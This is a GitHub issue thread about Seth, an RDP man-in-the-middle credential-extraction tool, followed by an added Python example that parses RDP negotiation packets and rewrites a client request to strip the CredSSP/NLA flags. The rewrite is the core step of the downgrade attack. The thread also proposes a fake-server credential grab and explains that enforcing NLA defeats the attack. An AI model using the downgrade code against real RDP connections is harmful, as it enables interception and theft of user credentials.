SySS-Research / Seth

Perform a MitM attack and extract clear text credentials from RDP connections
MIT License

Downgrading CredSSP works, but connection fails on subsequent SSL handshake #8

Closed AdrianVollmer closed 7 years ago

AdrianVollmer commented 7 years ago

Server Windows 2012 R2 6.3.9600 TLSv1.2 + ECDHE-RSA-AES256-SHA384: Debug Log (Client Windows 7 / 10 Login: Administrator / admin-123456) -> https://pastebin.com/Ar8Lb8pK

and

Debug Log (Windows 7 Client 6.3.9600 rdp 8.1) (Server Windows 10 10.0.14393 + NLA) (Login: admin / admin123456) -> https://pastebin.com/A9RNLEKx

AdrianVollmer commented 7 years ago

In these two cases, the last message is actually an "RDP negotiation failure" message, the reason being that the server insists on NLA. Cracking the NetNTLMv2 hash is the best we can do here. I'll write a patch that makes this clear to the pentester.

armin884 commented 7 years ago

So if the server forces NLA, the only thing we can do is crack the hash, and the user gets an error message?

NLA enable

AdrianVollmer commented 7 years ago

Well, yes, if you configure your setup correctly, it's secure. That's the whole point of this PoC.

However, it's only the Man in the Middle attack that becomes impossible. What we could do as an attacker is basically stop talking to the real host altogether and only talk to the client, follow the protocol up to authentication, grab the credentials and exit (it would then be a replay attack or "fake server attack"). The victim will notice that their correct password doesn't work and the attacker won't be able to grab key strokes in the following session. No big deal I guess, since at that point it's already too late.

It might be fun to add this feature as well, but it might take me a little more time.

armin884 commented 7 years ago

OK, thanks for the info. Well, if you have time, you could add a feature like a "fake server". Or maybe you have some deeper info on when this Windows login prompt shows up or not. I'm referring to this tool and this issue: https://github.com/citronneur/rdpy/issues/39

AdrianVollmer commented 7 years ago

Regarding your question, it works like this. First, the client tells the server its capabilities, which can be standard security, enhanced security (which is simply SSL), or CredSSP (also called NLA). The server then chooses one of those (usually the highest).

So the login prompt you are talking about appears if the client is capable of NLA and if the server chooses NLA.

Seth modifies the capabilities advertised by the client on the fly. So the server thinks the client is incapable of NLA and offers just SSL. Unless you configured the server to enforce NLA, then no connection will be established, as you saw.
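The negotiation described in the last comment is carried in the X.224 Connection Request / Connection Confirm at the very start of the RDP session (MS-RDPBCGR, RDP_NEG_REQ / RDP_NEG_RSP / RDP_NEG_FAILURE). The following is an added example written for this page, not Seth's own code: it parses the client's requestedProtocols, clears the CredSSP bits the way a downgrading MitM would, and classifies the server's answer so the two outcomes in the thread (server picks plain TLS, or server refuses because it requires NLA) can be told apart. The packets are constructed inline for the demo; the cookie user name is an arbitrary assumption.

```python
"""RDP X.224 negotiation: parse, downgrade, and classify (added example, not Seth's code).

Field layouts and constants follow MS-RDPBCGR; the sample packets are constructed here.
"""
import struct

# requestedProtocols / selectedProtocol flags
PROTOCOL_RDP = 0x00000000        # standard RDP security
PROTOCOL_SSL = 0x00000001        # TLS ("enhanced security")
PROTOCOL_HYBRID = 0x00000002     # CredSSP, i.e. NLA
PROTOCOL_HYBRID_EX = 0x00000008  # CredSSP with early user-auth result

TYPE_RDP_NEG_REQ = 0x01
TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03

FAILURE_CODES = {
    0x01: "SSL_REQUIRED_BY_SERVER",
    0x02: "SSL_NOT_ALLOWED_BY_SERVER",
    0x03: "SSL_CERT_NOT_ON_SERVER",
    0x04: "INCONSISTENT_FLAGS",
    0x05: "HYBRID_REQUIRED_BY_SERVER",
    0x06: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def _check_tpkt(pkt):
    """Validate the 4-byte TPKT header (version 3, big-endian total length)."""
    version, _reserved, length = struct.unpack(">BBH", pkt[:4])
    if version != 3 or length != len(pkt) or 5 + pkt[4] > len(pkt):
        raise ValueError("bad TPKT/X.224 framing")


def _neg_struct_offset(pkt):
    """Offset of the optional rdpNeg* structure inside the X.224 TPDU, or None if absent."""
    x224_end = 5 + pkt[4]                      # LI counts the bytes after itself
    pos = 11                                   # TPKT(4) + LI(1) + code(1) + dst(2) + src(2) + class(1)
    if pkt[pos:].startswith(b"Cookie:"):       # optional "Cookie: mstshash=<user>\r\n"
        pos = pkt.index(b"\r\n", pos) + 2
    return pos if x224_end - pos >= 8 else None


def parse_neg_req(pkt):
    """Return the client's requestedProtocols, or None for a legacy client without RDP_NEG_REQ."""
    _check_tpkt(pkt)
    if pkt[5] != 0xE0:
        raise ValueError("not an X.224 Connection Request")
    off = _neg_struct_offset(pkt)
    if off is None:
        return None
    neg_type, _flags, length, protocols = struct.unpack("<BBHI", pkt[off:off + 8])
    if neg_type != TYPE_RDP_NEG_REQ or length != 8:
        raise ValueError("malformed RDP_NEG_REQ")
    return protocols


def downgrade_neg_req(pkt):
    """Rewrite the request so the client no longer advertises CredSSP (the on-the-fly edit
    described above); the server then sees a client that can at most do TLS."""
    protocols = parse_neg_req(pkt)
    if protocols is None:
        return pkt                              # nothing to strip
    off = _neg_struct_offset(pkt)
    stripped = protocols & ~(PROTOCOL_HYBRID | PROTOCOL_HYBRID_EX)
    return pkt[:off + 4] + struct.pack("<I", stripped) + pkt[off + 8:]


def parse_neg_confirm(pkt):
    """Classify the server's X.224 Connection Confirm.
    Returns ("rsp", selectedProtocol) or ("failure", failure_name)."""
    _check_tpkt(pkt)
    if pkt[5] != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    off = _neg_struct_offset(pkt)
    if off is None:
        return ("rsp", PROTOCOL_RDP)           # legacy server: standard RDP security
    neg_type, _flags, length, value = struct.unpack("<BBHI", pkt[off:off + 8])
    if length != 8:
        raise ValueError("malformed rdpNeg structure")
    if neg_type == TYPE_RDP_NEG_RSP:
        return ("rsp", value)
    if neg_type == TYPE_RDP_NEG_FAILURE:
        return ("failure", FAILURE_CODES.get(value, hex(value)))
    raise ValueError("unknown rdpNeg type %#x" % neg_type)


# --- constructed sample packets (not captures) ---------------------------------
def build_client_request(user, protocols):
    neg = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, protocols)
    cookie = b"Cookie: mstshash=" + user.encode("ascii") + b"\r\n"
    x224 = bytes([0xE0, 0, 0, 0, 0, 0]) + cookie + neg
    body = bytes([len(x224)]) + x224
    return struct.pack(">BBH", 3, 0, 4 + len(body)) + body


def build_server_confirm(neg_type, value):
    neg = struct.pack("<BBHI", neg_type, 0, 8, value)
    x224 = bytes([0xD0, 0, 0, 0, 0, 0]) + neg
    body = bytes([len(x224)]) + x224
    return struct.pack(">BBH", 3, 0, 4 + len(body)) + body


if __name__ == "__main__":
    req = build_client_request("admin", PROTOCOL_SSL | PROTOCOL_HYBRID)   # assumed user name
    print("client offers     :", hex(parse_neg_req(req)))
    print("after downgrade   :", hex(parse_neg_req(downgrade_neg_req(req))))
    print("server picks TLS  :", parse_neg_confirm(build_server_confirm(TYPE_RDP_NEG_RSP, PROTOCOL_SSL)))
    print("server forces NLA :", parse_neg_confirm(build_server_confirm(TYPE_RDP_NEG_FAILURE, 0x05)))
```

A MitM only needs to patch the four requestedProtocols bytes, so the rewritten request keeps its length and the TPKT/X.224 length fields stay valid. If the Connection Confirm comes back as a failure with HYBRID_REQUIRED_BY_SERVER, the server enforces NLA and the downgrade path is closed, which is the condition the earlier comments describe.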